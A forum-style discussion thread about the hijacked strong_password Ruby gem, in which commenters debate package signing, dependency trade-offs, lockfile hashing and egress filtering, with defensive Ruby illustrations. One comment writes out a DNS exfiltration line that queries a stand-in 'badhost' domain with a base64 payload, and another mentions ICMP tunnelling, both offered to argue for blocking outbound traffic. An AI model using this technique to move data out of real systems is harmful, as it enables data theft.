I am not sure signatures are that useful since without a centralized authority to issue the certificates and securely verify author identities, we are just back to a trust-on-first-use policy for the signatures, and people will just end up setting their CI servers to always trust new signatures since they won’t want to deal with what happens when authors change their certificate from version to version (which will surely happen).
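For illustration, here is a minimal sketch of the trust-on-first-use behaviour described above, and of how an "always accept" setting on a CI server would defeat it. The `PinStore` class, the `auto_accept` flag, and the key strings are hypothetical names invented for this example; this is not how RubyGems or any real package manager stores keys.

```ruby
require "digest"

# Hypothetical trust-on-first-use store: remembers the first signing-key
# fingerprint seen for each author and compares later keys against it.
class PinStore
  def initialize(auto_accept: false)
    @pins = {}                  # author name => pinned fingerprint
    @auto_accept = auto_accept  # the "always trust new signatures" CI shortcut
  end

  # Returns :first_use, :match, :replaced or :mismatch.
  def check(author, public_key)
    fingerprint = Digest::SHA256.hexdigest(public_key)
    pinned = @pins[author]

    if pinned.nil?
      @pins[author] = fingerprint   # nothing to compare against yet
      :first_use
    elsif pinned == fingerprint
      :match
    elsif @auto_accept
      @pins[author] = fingerprint   # silently trusts whoever holds the new key
      :replaced
    else
      :mismatch
    end
  end
end

strict = PinStore.new
strict.check("alice", "key-v1")         # pinned on first use, unverified
strict.check("alice", "key-v2")         # a changed key is rejected

lenient = PinStore.new(auto_accept: true)
lenient.check("alice", "key-v1")
lenient.check("alice", "attacker-key")  # accepted, so the pin protects nothing
```

The strict store only helps if a human actually investigates the `:mismatch` case; the lenient one is equivalent to having no pinning at all.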

Sure, obviously reinventing as many wheels as possible will minimize your exposure to third-party malfeasance.

As in all forms of engineering there are, of course, no absolutes, only trade-offs to be made.

The more wheels you reinvent, the slower your velocity for solving the core business problems that pay your bills. Moving too slowly can be fatal to the business. It’s a tricky balance. Signing isn’t perfect, but it can improve some aspects of some balances people strike.

It's not about the amount of functionality shifted to dependencies, but about the fragmentation of these dependencies.

Packaging and distributing libraries properly takes effort, so it only gets done properly when it's sufficiently centralized. If you have to import fifty third-party wheels, then it's unavoidable that some or most of these wheels can't be managed properly, but it's quite feasible to have a single (or three) well-managed third-party package that provides a hundred wheels so that you don't have to reinvent them. If the strong_password gem was integrated in (for example) Rails and managed/released by the same team with the same processes, then this risk would be avoided. If instead of a dozen separate gems with every functionality separate you'd have a single bundle of varied functionality, like Guava or Apache Commons in Java, then that bundle can handle release management in a way that each separate gem developer cannot.

If you want to have reliable dependencies then you either have to choose only dependencies with bureaucratic and pedantic release governance, or manage/audit each dependency yourself (as the author of the original article seems to have done). In ecosystems where it's reasonable to have serious projects that have 0-3 distinct (but large) external dependencies this works easily; in ecosystems where you have dozens or even a hundred dependencies, that overhead is impractical for most projects.

> If you want to have reliable dependencies then you either have to choose only dependencies with bureaucratic and pedantic release governance, or manage/audit each dependency yourself

That's a false dichotomy. There are middle grounds which can and do work at scale:

Upgrade knowingly and deliberately (don't just spray greenkeeper everywhere).

Carefully monitor changed application/network behavior after upgrades.

Devote a manageable, non-zero amount of time to reading/finding security bulletins or security incidents on your most-heavily-used dependencies.

Pay attention to issue reports and prioritize any with possible security implications.

...and (at a slightly larger scale) hire, empower, and compensate people to do those kinds of things in a systematic, regular way.

Seriously, security engineering isn't served well by "ZOMG NPM is garbage we must switch to $megaframework and pray that their release engineers get everything right" hysteria and absolutism. There are effective, moderate strategies that help with these issues every day.

I think we can simplify that middle ground proposal down to two items:

1) only upgrade dependencies “knowingly and deliberately” (as the author of this article did). What does this mean if not auditing the upgrades? Just upgrading more rarely (e.g. because you know you need a specific feature or bug fix), but still auditing them? By waiting to upgrade, the diff will be vastly larger and performing an audit to “knowingly” upgrade will be much more difficult.

2) detecting a breach after you’ve already installed an attacker’s code onto your servers, via active monitoring or by hoping someone else does active monitoring or auditing and reports the issue to you or to a central authority.

#1 as a “middle ground” doesn’t seem too different from the post you responded to. #2 is what most projects seem to rely on - hope someone else finds the problem and reports it, and that they don’t get hit too hard in the meantime.

What I’d say though is that in an ecosystem like Java, it’s not necessarily “reinventing the wheel”. It’s more that you can import Spring, Guava, and Apache Commons and you have a collection of 1000s of wheels of different shapes and sizes ready to go when you need them.

Whereas in some other ecosystems, you have to go get each wheel individually from a different person. There are certainly reasons why each ecosystem evolved the way it did, but I don’t think it’s impossible that this sort of stuff could centralize more in the future, especially as it becomes more clear what should be “batteries included” or what things are actually needed and used by the community.

> What I’d say though is that in an ecosystem like Java, it’s not necessarily “reinventing the wheel”. It’s more that you can import Spring, Guava, and Apache Commons and you have a collection of 1000s of wheels of different shapes and sizes ready to go when you need them.

Sure, but even here we see you modulating your position from “only Spring” to “Spring, Guava, and Apache Commons”, tripling the number of dependencies you’re willing to admit.

Really what it boils down to is, you’re saying what I’m saying. Declaring absolutely “this dependency, and no others” is silly — rather, it’s a question of trade-offs, and you feel that in your usecases trading off say, 3 or 4 large dependencies is worth the velocity gain. Nobody is arguing with that.

Fewer, larger, carefully considered dependencies is a rational set of trade-offs to make.

I interpreted that differently: it's fine to have many dependencies, even third-party ones. What's a problem is having many third-parties.

The maintenance and trust verification overhead for a micro "5 lines of code" dependency is usually way higher than just rewriting those 5 lines yourself.

As an aside: just because someone made their code available doesn't mean it's good or that it solves all your edge cases. Getting those fixed also takes up time.

> The maintenance and trust verification overhead for a micro "5 lines of code" dependency is usually way higher than just rewriting those 5 lines yourself.

Sure. I was in no way advocating “JS-style, 5 line microlibs Uber Alles”, merely pointing out that there’s a clear trade-off between dependencies and velocity that there’s no silver bullet for.

There’s absolutely nothing wrong with OP saying “we can afford to make Spring our only dependency”, but there’s also nothing wrong with saying “we need actor-based concurrency and the business will be dead before we roll our own, let’s bring in Akka”, “we need to deal with time and spending 40 hours a month keeping up with every legislature on the planet’s timezone-related lawmaking doesn’t pay the bills, bring in JodaTime”, etc.

It’s engineering; these trade-offs should of course be carefully considered (is_even should fail most any sane consideration), but it’s a bit silly to suggest they can just be avoided entirely by businesses that have to make money to pay the bills.

Again, signing helps when you need to make those trade-offs. There are no absolutes here.

I think those are great examples of what I was talking about actually in the Java ecosystem.

JodaTime is now deprecated in favor of Java 8 time (JSR-310). Akka is an official library from Typesafe/Lightbend. In a JVM ecosystem, you can get this kind of stuff directly from a supported corporate vendor. You can even easily pay them for support if you want. And a lot of times stuff even gets standardized through the JSR process.

Now, if you’re in a pre-Java 8 world and you need JodaTime, sure it makes sense to bring it in, not just use only Spring. But eventually that software library gets recognized as necessary to the ecosystem and standardized, and you no longer have to rely on yet another 3rd party for it.

Whereas in another ecosystem, JodaTime might just keep existing, maybe even alongside the bad default language library, and everyone has to always be told to go get this third party dependency if you want to do things right.

Reinventing the wheel is one end of the spectrum, but so is putting a bunch of magic words in a file and thinking you needn't worry. (To be fair, too many tutorials hand wave away what really happens in Gemfile/package.json/etc and barely pay lip service, if at all, to the responsibilities that come with having those dependencies) I don't miss the "old" days of searching for libs, extracting a zip, and trying to figure out the integration steps, but there is something to be said for there being a bit more of a sense of ownership.

> Reinventing the wheel is one end of the spectrum, but so is putting a bunch of magic words in a file and thinking you needn't worry.

Yeah. I didn’t claim otherwise? Like I said, there are only trade-offs here. You can gain a ton of velocity if you abstract it all out to a file of 50,000 “magic words”; but obviously then your exposure to these issues is enormous.

Trade-offs are like that.

> I don't miss the "old" days of searching for libs, extracting a zip, and trying to figure out the integration steps, but there is something to be said for there being a bit more of a sense of ownership.

Eh, to the extent that I get any such feeling, I think it’s mostly a completely false sense of security. I did some stuff in a C++ codebase that was fully developed that way, and did the ol’ “hunt, unzip, and compile” for some boost libs. I didn’t audit the source. It being boost C++ god knows if I’d even have been able to recognize a heavily template-metaprogrammed exploit.

If boost’s account had been compromised I’d have been every bit as fucked as people who use this gem were. Supply chain attacks are dangerous regardless. All you can do is try to balance your exposure vs your time spent on solving problems that don’t pay the bills vs those that do.

> I think it’s mostly a completely false sense of security

I wasn't so much thinking about avoiding vulns due to added scrutiny as much as issues with updated libs, since most build processes pull gems, etc when deploying or rebuilding a container; I don't think many vendor the gems. Typically you'd ship the actual files you unzipped as opposed to letting the package manager grab the most recent version within version spec.

Typically your deployment process would pull gems based on hashes recorded in a lock file you committed, not pull arbitrary new versions automagically. So while I’m not shipping the actual file, something is verifying that I’m shipping files that have the hash I expect. Barring some very alarming developments in hash insecurity, it’s mostly a distinction without a difference.
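A minimal sketch of that kind of hash check, assuming a made-up `pins` table that maps a file name to the SHA-256 recorded when the dependency was last reviewed. The table, the `verify_artifact` helper, and the `HashMismatch` error are illustrative names only, not Bundler's actual lockfile format or API.

```ruby
require "digest"

# Raised when a downloaded artifact does not match its recorded hash.
class HashMismatch < StandardError; end

# Compares the SHA-256 of the downloaded bytes against the pinned value.
# `pins` is a hypothetical table: file name => expected hex digest.
def verify_artifact(name, bytes, pins)
  expected = pins.fetch(name) { raise ArgumentError, "no pinned hash for #{name}" }
  actual = Digest::SHA256.hexdigest(bytes)
  return true if actual == expected

  raise HashMismatch, "#{name}: expected #{expected}, got #{actual}"
end

reviewed = "contents of the gem file that was reviewed"
pins = { "example-1.0.0.gem" => Digest::SHA256.hexdigest(reviewed) }

verify_artifact("example-1.0.0.gem", reviewed, pins)  # passes

begin
  # Same file name and version, different contents.
  verify_artifact("example-1.0.0.gem", reviewed + "extra payload", pins)
rescue HashMismatch => e
  warn "refusing to install: #{e.message}"
end
```

A check like this catches a known version being swapped out from under you; it says nothing about whether a newly published version is safe to pin in the first place.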

Automating a “bundle update” to pull latest versions within spec and update the lockfile would be odd to my experience. You’d typically do that manually, (hopefully, if you’re competent) look at what changed, and retest (semver is great as long as everyone perfectly anticipates & categorizes every change’s impact. In the real world, however, ....) rather than blindly just letting a deployment run whatever.
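As a rough sketch of the "look at what changed" step, the snippet below lists the gems whose locked version differs between two lockfiles, which gives a short list of changesets to go and read. It assumes the usual Gemfile.lock layout where resolved gems sit under `specs:` indented by four spaces; the helper names and the sample lockfile text are made up for the example.

```ruby
# Extracts name => version pairs from the text of a Gemfile.lock.
# Resolved gems are indented by exactly four spaces; their own
# dependency lines are indented by six and are skipped.
def locked_versions(lockfile_text)
  lockfile_text.scan(/^ {4}(\S+) \(([^)]+)\)$/).to_h
end

# Returns [name, old_version, new_version] for every gem that was
# added, removed, or changed between the two lockfiles.
def changed_gems(old_text, new_text)
  old_versions = locked_versions(old_text)
  new_versions = locked_versions(new_text)

  (old_versions.keys | new_versions.keys).sort.map do |name|
    [name, old_versions[name], new_versions[name]]
  end.reject { |_, before, after| before == after }
end

old_lock = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      rack (2.0.7)
      strong_password (0.0.6)
LOCK

new_lock = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      rack (2.0.7)
      strong_password (0.0.7)
LOCK

changed_gems(old_lock, new_lock).each do |name, before, after|
  puts "#{name}: #{before || 'absent'} -> #{after || 'absent'}"
end
# prints: strong_password: 0.0.6 -> 0.0.7
```

The output is only a to-do list; someone still has to open each changed gem and read the diff.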

Bad devs can do the stupidest thing imaginable in any system, though, so I don’t doubt this is out there.

> The more wheels you reinvent, the slower your velocity for solving the core business problems that pay your bills.

And the more mistakes you make, pissing off your users (or worse, compromising their data because you thought you could roll your own replacement for some security-critical dependency you ditched).

I doubt that any solutions which start off as “let’s change the whole universe” are going to get very far.

Yes, the situation sucks. I just looked at the frontend of a relatively small app we use for administration, and it depends on almost 5000 node module versions. But this problem needs to be dealt with as soon as possible, and I don’t think that a fundamental change in development culture (making everything harder for developers in the process) is going to help.

5000? Wow. That's gotta be a pretty sizable fraction of the entire Node library ecosystem. Does it count duplicates?

With a dependency forest that large, it's a wonder that more JS projects aren't compromised by bad dependencies...

Create React App is pretty popular and it has 36k dependencies. That’s not saying everyone using it ships every one of those but that’s definitely a LOT of people who could potentially introduce malware, often with a fair chance of it being deniable.

I know there has been some recent discussion within the python community that Python's batteries included philosophy is failing the community, with some arguing that the python standard library should be streamlined. But I see third party dependencies as often a liability both for security and a kind of technical debt (I maintain infrequently used but essential legacy python applications)

Requiring signatures moves all responsibility to the maintainers. I've seen projects upload their signing private keys to git, saying that it's fine because they are passphrase protected.

Sure, as 2FA, signatures help with the problem that some people use weak passwords or share their passwords. But IMO it would be better to restrict upload rights to the top 100 maintainers and give them HSMs they use to authenticate those uploads. Anyone wanting to upload would have to ask one of the maintainers to sponsor them. This would reduce the number of people you have to trust when building anything from the package repository.

Yep, we get the same shit with both NPM and Maven.

It's staggering the lack of consideration given to basic security by what should be competent software engineers.

There's still a lot to learn about this incident, but most likely the RubyGems account was compromised, allowing the attacker to upload whatever they wanted. Signed releases with a web of trust would be ideal, but I doubt we'll ever see that world. A simple and pragmatic solution would be to have the next version of bundler support the ability to only install packages published with 2 factor enabled, then the next major rails version default it to on, with plenty of advanced warning in 6.x/bundler. This still has plenty of gaps, such as an attacker being able to take over even with 2 factor, and then re-enabling it with their own keys, or RubyGems.org itself being compromised. It still represents a major upgrade in security for the entire Ruby ecosystem without causing much pain to authors and users.

This is a great reason why you should never allow unknown outgoing connections from Production.

You can implement this however makes sense for you. For me, the easiest thing is to run a simple locked down proxy server, and allow only specific domains there. This makes it easy to setup whatever rules you want, allowing entire domains, or only specific hosts. And it gives you a convenient place to log entries before you lock them down.
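To make the allow-list idea concrete, here is a small sketch of the decision such a proxy would make for each outgoing request. The host names, the leading-dot convention for whole domains, and the helper names are assumptions chosen for the example, and the Pastebin path is a made-up placeholder.

```ruby
require "uri"

# Hypothetical allow list: exact hosts, plus whole domains written with a leading dot.
ALLOWED_HOSTS = ["rubygems.org", "api.example.com"].freeze
ALLOWED_DOMAINS = [".internal.example.com"].freeze

# Returns true when a request to this URL should be allowed to leave the network.
def egress_allowed?(url)
  host = URI.parse(url).host.to_s.downcase
  return false if host.empty?

  ALLOWED_HOSTS.include?(host) ||
    ALLOWED_DOMAINS.any? { |suffix| host.end_with?(suffix) }
rescue URI::InvalidURIError
  false
end

# Logs every decision, which is useful for building the list before enforcing it.
def check_and_log(url, log = $stderr)
  allowed = egress_allowed?(url)
  log.puts "#{allowed ? 'ALLOW' : 'DENY'} #{url}"
  allowed
end

check_and_log("https://rubygems.org/gems/rack")
check_and_log("https://pastebin.com/raw/abc123")
```

Matching on the exact host (or on a suffix that starts with a dot) avoids accidentally allowing look-alike names such as `evilrubygems.org`.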

This is also why you shouldn't allow external DNS resolution from every host in your network. It would be just as easy to move data in and out with Dnsruby::Resolver.query('base64-encoded-payload.badhost.com', 'TXT'), 255 bytes at a time.

Once everything is moving through your proxy, there's no need to allow external DNS resolution from other hosts.

If an attacker has the ability to send dig queries to a remote host, he can over-ride anything you put in place on the host to prevent external DNS queries.

Also, most of this traffic is still unencrypted and dig'ging strange servers is noisy as hell. I'm pretty sure (famous last words) that most entry-level firewalls would flag this out of the box. If they don't, they should.
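As a sketch of why this kind of traffic stands out, the heuristic below flags query names containing very long labels or labels that look like encoded data. The thresholds are illustrative guesses rather than values from any real firewall, and a simple check like this will produce false positives on some legitimate names.

```ruby
# Shannon entropy in bits per character; encoded payloads tend to score
# higher than ordinary host names.
def shannon_entropy(text)
  return 0.0 if text.empty?

  counts = text.each_char.group_by { |char| char }.values.map(&:length)
  counts.sum do |count|
    probability = count.to_f / text.length
    -probability * Math.log2(probability)
  end
end

# Illustrative thresholds only; real traffic would need tuning.
MAX_LABEL_LENGTH = 40
MIN_LENGTH_FOR_ENTROPY_CHECK = 16
MAX_LABEL_ENTROPY = 4.0

# Flags a DNS query name if any dot-separated label is unusually long
# or is long enough to measure and has high character entropy.
def suspicious_query?(name)
  name.split(".").any? do |label|
    label.length > MAX_LABEL_LENGTH ||
      (label.length >= MIN_LENGTH_FOR_ENTROPY_CHECK &&
        shannon_entropy(label) > MAX_LABEL_ENTROPY)
  end
end

suspicious_query?("www.example.com")
suspicious_query?("aGVsbG8gd29ybGQgdGhpcyBpcyBzZWNyZXQ.badhost.example")
```

The first name has only short labels and passes; the second carries a base64-looking label and is flagged.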

Still upvoted you though. This is an exfiltration technique that is really easy to spot and not widely known about.

Right, worry about outgoing traffic first, and DNS resolution second. And this goes for all traffic. Even ICMP can be used to tunnel data.

> I went line by line linking to each library’s changeset. This due diligence never reported significant surprises to me, until this time.

Mad props to the author, Tute Costa, for doing this. It's a large investment of time for usually no return, so I think very few people do. And his (?) reaction to finding this was quite effective.

Thank you for your service sir.

If you have time and/or money and want to contribute to fixing this issue, please feel free to join in: https://github.com/rubygems/rubygems/issues/2496

The way I see it, the root of the problem is that there isn't an independently verifiable association between a package and code commit hash that it's been generated from. My GitHub page can have good code, but no one has any idea what's in the corresponding package.
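A minimal sketch of what such a check could look like if done by hand, assuming the gem has already been unpacked into one directory (for instance with `gem unpack`) and the corresponding commit has been checked out into another. The helper names and the demo file contents are hypothetical, and this does not establish which commit a package claims to come from; it only reports files in the package that the checkout cannot account for.

```ruby
require "digest"
require "find"
require "pathname"
require "tmpdir"
require "fileutils"

# Maps each file's path (relative to root) to the SHA-256 of its contents.
def tree_digests(root)
  base = Pathname.new(root)
  digests = {}
  Find.find(root) do |path|
    Find.prune if File.directory?(path) && File.basename(path) == ".git"
    next unless File.file?(path)

    relative = Pathname.new(path).relative_path_from(base).to_s
    digests[relative] = Digest::SHA256.file(path).hexdigest
  end
  digests
end

# Returns files in the unpacked package that are missing from, or differ
# from, the source checkout. Files that exist only in the checkout are
# ignored, since packages often ship a subset of the repository.
def unexplained_files(package_dir, source_dir)
  source = tree_digests(source_dir)
  tree_digests(package_dir).reject { |file, digest| source[file] == digest }.keys.sort
end

# Demo with throwaway directories standing in for the checkout and the package.
Dir.mktmpdir do |tmp|
  source = File.join(tmp, "checkout")
  package = File.join(tmp, "unpacked_gem")
  [source, package].each { |dir| FileUtils.mkdir_p(File.join(dir, "lib")) }

  File.write(File.join(source, "lib", "checker.rb"), "puts 'reviewed'\n")
  File.write(File.join(package, "lib", "checker.rb"), "puts 'reviewed'\nputs 'extra'\n")

  p unexplained_files(package, source)
end
```

Generated files (compiled extensions, bundled assets) would show up as unexplained too, which is part of why this is hard to do without reproducible builds.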

Does the upcoming built-in package manager on GitHub solve this problem? Does it guarantee that packages are only built from code pushed to GitHub, and does it associate the commit hash with the package metadata in some way?

RubyGems should contract an external auditor (security firm); this could go way deeper. Until they perform a thorough audit I will personally stay away from this project.

So why does this not apply to everything?

If "this could go way deeper" is your answer to a super unpopular rubygem getting hijacked, why isn't that just the default assumption then?

Do you only use thoroughly audited software projects? How do you manage that?

How do you suggest that Rubygems fund that effort? Also when you're staying away from Rubygems, which alternative will you be using, and do you think they have better security?

Incidents like this really show the lack of proper security measures in place. Why should package ownership be able to be arbitrarily shifted on a whim? It's a large single point of failure. Sadly, there are no good alternatives besides entering GitHub repo paths manually for now.

We really need more signing support in language specific packaging.

why not just restrict the production environment to not open ports other than 80 and not to create TCP channels to unauthorized hosts?

It’s effective but tends to be a considerable amount of work to maintain, especially since the web is more dynamic these days: imagine what it would take to filter only authorized connections to a service hosted on AWS, for example, where anyone in the world can get IPs in the possible range and even put data on white-listed hostnames like S3. You’re basically building an allow list of host names, intermediating every update path, etc. and dealing with things which were designed with a more open model — e.g. do you disable things like OCSP or whitelist more third-party resources?

This also heavily encourages microservices since most non-trivial applications will have some reason to connect to fairly arbitrary resources. Hopefully that can be sandboxed well, but relatively few apps were designed that way, and that general class of bug, where something works that wasn’t supposed to, is notoriously easy for even experienced teams to miss.
